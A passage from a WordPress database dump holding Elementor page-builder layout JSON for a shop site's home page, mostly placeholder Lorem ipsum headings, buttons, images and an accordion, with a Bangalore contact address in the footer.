:\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8603,1501,'_elementor_page_assets','a:0:{}'),(8605,1502,'_elementor_edit_mode','builder'),(8606,1502,'_elementor_template_type','wp-page'),(8607,1502,'_elementor_version','3.7.7'),(8608,1502,'_wp_page_template','elementor_canvas'),(8609,1502,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion 